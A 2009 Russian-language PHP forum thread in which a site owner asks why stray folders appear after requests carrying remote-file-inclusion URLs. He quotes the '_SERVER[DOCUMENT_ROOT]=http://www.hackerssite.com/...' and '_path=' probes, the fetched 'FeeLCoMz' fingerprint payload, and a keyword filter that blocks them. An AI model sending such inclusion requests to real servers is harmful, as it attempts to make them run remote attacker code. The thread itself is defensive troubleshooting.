|
|
|
| В корне сайта стали появляться левые папки.
Анализ выявил, что создают их путём модификации урла:
http://www.mysite.com/some/path////?_SERVER[DOCUMENT_ROOT]=http://www.hackerssite.com//something.txt?
|
Есть варианты:
http://www.mysite.com/some/path/config.inc.php/?_path=http://www.hackerssite.com//something.txt?
|
Но никакого config.inc.php нет. Да и каталога /some/path/ в реале на сервере не существует.
А я ума не приложу, что и как можно таким образом сделать. Помогите разобраться, плиз, что это за фигня. | |
|
|
|
|
|
|
|
для: Axxil
(11.08.2009 в 18:04)
| | a register_globals выключен? | |
|
|
|
|
|
|
|
для: Trianon
(11.08.2009 в 18:11)
| | Да
PS. На сервере стоит PHP 5.2 | |
|
|
|
|
|
|
|
для: Axxil
(11.08.2009 в 18:04)
| | А если самому запустить? Создадутся? Тогда и отлаживать полегче будет... | |
|
|
|
|
|
|
|
для: Евгений Петров
(12.08.2009 в 01:28)
| | Создаётся.
Только я технологию этого дела понять не могу :(
Если бы это был внедрённых скрипт, то все обращения бы шли к нему в определённую папку.
А так, получается что это XSS? | |
|
|
|
|
|
|
|
для: Axxil
(12.08.2009 в 11:31)
| | логично было бы начать с изучения something.txt | |
|
|
|
|
|
|
|
для: Loki
(12.08.2009 в 12:37)
| | something.txt выдаёт всякую фигню по типу:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
|
Я так понимаю реальный код прямым обращением через браузер не увидеть.
Я предполагал, что это php inluding. Но непонятно как это можно осуществить с выключенными register_globals | |
|
|
|
|
|
|
|
для: Axxil
(12.08.2009 в 12:48)
| | Судя по всему, ваш код сам себе гадит... проверяйте логику скрипта... | |
|
|
|
|
|
|
|
для: Loki
(12.08.2009 в 12:56)
| | Вы думаете он сам себе посылает эти запросы? :) | |
|
|
|
|
|
|
|
для: Axxil
(12.08.2009 в 12:59)
| | Нет, я думаю что он сам создает каталоги только на основании того, что "url какой-то странный". Как видите, в хакерском коде ничего деструктивного... да и не исполняется он, наверняка. | |
|
|
|
|
|
|
|
для: Loki
(12.08.2009 в 13:05)
| | Я вот тоже полагал, что нереально удалённым кодом создать каталог у меня на сервере, у которого владелец апач будет.
Скорее всего да, мой код где-то чудит. Спасибо, буду разбираться с ним. | |
|
|
|
|
|
|
|
для: Axxil
(12.08.2009 в 11:31)
| | >Анализ выявил, что создают их путём модификации урла:
При этом содержимое Вашего скрипта никак не влияет на процесс атаки? | |
|
|
|
|
|
|
|
для: Trianon
(12.08.2009 в 12:48)
| | какого скрипта?
Понятно, что я могу тупо резать обращения по признаку:
if(stripos($_SERVER['REQUEST_URI'],'_path') !== false || stripos($_SERVER['REQUEST_URI'],'_SERVER') !== false){
exit;
}
|
и тогда проблем не будет. Но мне хочется суть явления понять. | |
|
|
|
|
|
|
|
для: Axxil
(12.08.2009 в 12:49)
| | ну почему же.
Если эта строка и вправду помогает, значит атакуемому способствует какой-то Ваш код, исполняющийся ниже.
Я-то полагал, что каталоги возникают еще до выполнения текста скрипта. | |
|
|
|
|
|
|
|
для: Trianon
(12.08.2009 в 13:05)
| | Я тоже так полагал :)
Теперь понял, что дело, скорее всего, в моём коде.
Спасибо за помощь. | |
|
|
|